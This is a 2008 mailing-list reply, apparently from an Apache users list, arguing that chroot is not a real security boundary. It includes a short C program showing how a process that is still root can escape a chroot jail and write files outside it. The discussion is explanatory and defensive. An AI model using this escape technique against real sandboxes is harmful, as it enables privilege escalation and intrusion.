> -----Original Message----- > From: Colm MacCarthaigh [mailto:[EMAIL PROTECTED] > Sent: Donnerstag, 24. Januar 2008 13:16 > To: [email protected] > Subject: Re: High security > > On Thu, Jan 24, 2008 at 01:10:23PM +0100, Nick Gearls wrote: > > You specify one directive, and the only thing you have to > put in the > > jail is your htdocs and logs directories; all other files (conf, > > modules, httpd, libraries, etc.) are outside of the jail. > This is really > > top security - it's almost impossible to find something to hack. > > Well don't kid yourself, it makes privilege escalation by > certain routes > much harder, but it's not even clost to almost impossible. There are > many forms of IPC available between the children and the root-level > Apache process anyway, and if you manage to exploit that it's > game over > anyway (including breaking out of the jail).
Yep. chroot was never designed to be a security feature. It can make things more difficult to leave a jailed area. See also http://kerneltrap.org/Linux/Abusing_chroot or have a look at #include <stdio.h> #include <unistd.h> #include <sys/stat.h> #include <sys/types.h> int main(int argc, char *argv[]) { FILE *file; chroot("/tmp/zw/blah1"); chdir("/"); file = fopen("blah1", "w"); fprintf(file, "Hello\n"); fclose(file); mkdir("foo", 493); chroot("foo"); chdir(".."); chdir("blah2"); file = fopen("blah2", "w"); fprintf(file, "Hello\n"); fclose(file); return 0; } which allows you to escape the chroot of /tmp/zw/blah1 if you are still root at the point of time mkdir is executed and write a file to /tmp/zw/blah2 Regards Rüdiger
